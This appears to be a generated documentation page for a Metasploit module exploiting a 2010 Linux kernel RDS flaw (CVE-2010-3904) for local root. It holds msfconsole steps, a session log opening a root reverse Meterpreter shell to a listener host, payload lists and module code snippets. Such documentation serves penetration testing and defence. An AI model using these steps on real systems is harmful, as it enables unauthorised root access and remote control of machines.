Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/rds_rds_page_copy_user_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation
Module: exploit/linux/local/rds_rds_page_copy_user_priv_esc
Source code: modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb
Disclosure date: 2010-10-20
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2010-3904

This module is also known as rds-fail.c.

This module exploits a vulnerability in the rds_page_copy_user function in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 to execute code as root (CVE-2010-3904). This module has been tested successfully on: Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Reliability:

  • unreliable-session: The module isn't expected to get a shell reliably (such as only once).

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
msf exploit(rds_rds_page_copy_user_priv_esc) > show targets
    ... a list of targets ...
msf exploit(rds_rds_page_copy_user_priv_esc) > set TARGET target-id
msf exploit(rds_rds_page_copy_user_priv_esc) > show options
    ... show and set options ...
msf exploit(rds_rds_page_copy_user_priv_esc) > set SESSION session-id
msf exploit(rds_rds_page_copy_user_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module exploits a vulnerability in the rds_page_copy_user function in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 to execute code as root (CVE-2010-3904).

Vulnerable Application


This module has been tested successfully on:

  • Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE
  • Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/rds_rds_page_copy_user_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

COMPILE

Options: Auto True False (default: Auto)

Whether the exploit should be live compiled with gcc on the target system, or uploaded as a pre-compiled binary.

Auto will first determine if gcc is installed to compile live on the system, and fall back to uploading a pre-compiled binary.

Compiled Executables


The module makes use of two pre-compiled exploit executables (rds.x86 and rds.x64), to be use when gcc is not available on the target host for live compiling, or COMPILE is set to False.

The executables were cross-compiled with musl-cross:

./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c

Scenarios


  msf5 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
  [*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (853256 bytes) to 172.16.191.149
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
  [+] Deleted /tmp/.zEAOL.c
  [+] Deleted /tmp/.zEAOL
  [+] Deleted /tmp/.kBTWC7E

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.149
  OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 

Re-exploitation


The exploit C code utilizes a defined send (5555) and receive (6666) port, which are opened while the payload is active. Attempt to re-exploit while a successful exploit payload is open will result in the error:

[*] Could not bind socket.

However, killing that payload will allow for the exploit to run successfully.

Go back to menu.

Msfconsole Usage


Here is how the linux/local/rds_rds_page_copy_user_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc

[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > show info

       Name: Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation
     Module: exploit/linux/local/rds_rds_page_copy_user_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-10-20

Provided by:
  Dan Rosenberg
  bcoles <[email protected]>

Module side effects:
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 unreliable-session

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module exploits a vulnerability in the `rds_page_copy_user` 
  function in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 
  to 2.6.36-rc8 to execute code as root (CVE-2010-3904). This module 
  has been tested successfully on: Fedora 13 (i686) kernel version 
  2.6.33.3-85.fc13.i686.PAE; and Ubuntu 10.04 (x86_64) with kernel 
  version 2.6.32-21-generic.

References:
  https://www.exploit-db.com/exploits/15285
  https://nvd.nist.gov/vuln/detail/CVE-2010-3904
  http://www.securityfocus.com/bid/44219
  https://securitytracker.com/id?1024613
  https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f
  http://vulnfactory.org/exploits/rds-fail.c
  http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/
  http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c

Also known as:
  rds-fail.c

Module Options


This is a complete list of options available in the linux/local/rds_rds_page_copy_user_priv_esc exploit:

msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > show options

Module options (exploit/linux/local/rds_rds_page_copy_user_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/rds_rds_page_copy_user_priv_esc exploit:

msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > show advanced

Module advanced options (exploit/linux/local/rds_rds_page_copy_user_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  true             no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/rds_rds_page_copy_user_priv_esc module can exploit:

msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/rds_rds_page_copy_user_priv_esc exploit:

msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/adduser                                          normal  No     Linux Add User
   19  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   20  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   23  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   24  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   25  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   26  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   27  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   31  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   32  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   33  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   34  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   35  payload/linux/x86/read_file                                        normal  No     Linux Read File
   36  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   37  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   38  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   39  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   40  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   41  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   42  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   46  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   47  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   48  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   49  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/rds_rds_page_copy_user_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Linux kernel version <VERSION> is not vulnerable


Here is a relevant code snippet related to the "Linux kernel version <VERSION> is not vulnerable" error message:

91:	
92:	  def check
93:	    version = kernel_release
94:	    unless Rex::Version.new(version.split('-').first) >= Rex::Version.new('2.6.30') &&
95:	           Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.37')
96:	      return CheckCode::Safe("Linux kernel version #{version} is not vulnerable")
97:	    end
98:	    vprint_good "Linux kernel version #{version} appears to be vulnerable"
99:	
100:	    unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
101:	      return CheckCode::Safe('RDS kernel module is not available')

RDS kernel module is not available


Here is a relevant code snippet related to the "RDS kernel module is not available" error message:

96:	      return CheckCode::Safe("Linux kernel version #{version} is not vulnerable")
97:	    end
98:	    vprint_good "Linux kernel version #{version} appears to be vulnerable"
99:	
100:	    unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
101:	      return CheckCode::Safe('RDS kernel module is not available')
102:	    end
103:	    vprint_good 'RDS kernel module is available'
104:	
105:	    if modules_disabled?
106:	      unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'

RDS kernel module is not loadable


Here is a relevant code snippet related to the "RDS kernel module is not loadable" error message:

102:	    end
103:	    vprint_good 'RDS kernel module is available'
104:	
105:	    if modules_disabled?
106:	      unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
107:	        return CheckCode::Safe('RDS kernel module is not loadable')
108:	      end
109:	    end
110:	    vprint_good 'RDS kernel module is loadable'
111:	
112:	    CheckCode::Appears

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

113:	  end
114:	
115:	  def exploit
116:	    if is_root?
117:	      unless datastore['ForceExploit']
118:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
119:	      end
120:	    end
121:	
122:	    unless writable? base_dir
123:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

118:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
119:	      end
120:	    end
121:	
122:	    unless writable? base_dir
123:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
124:	    end
125:	
126:	    executable_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
127:	
128:	    if live_compile?

No pre-compiled binaries are available for system architecture: <ARCH>


Here is a relevant code snippet related to the "No pre-compiled binaries are available for system architecture: <ARCH>" error message:

135:	      when /amd64|ia64|x86_64|x64/i
136:	        upload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x64')
137:	      when /x86|i[3456]86/
138:	        upload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x86')
139:	      else
140:	        fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
141:	      end
142:	    end
143:	
144:	    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
145:	    upload_and_chmodx payload_path, generate_payload_exe

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Dan Rosenberg
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.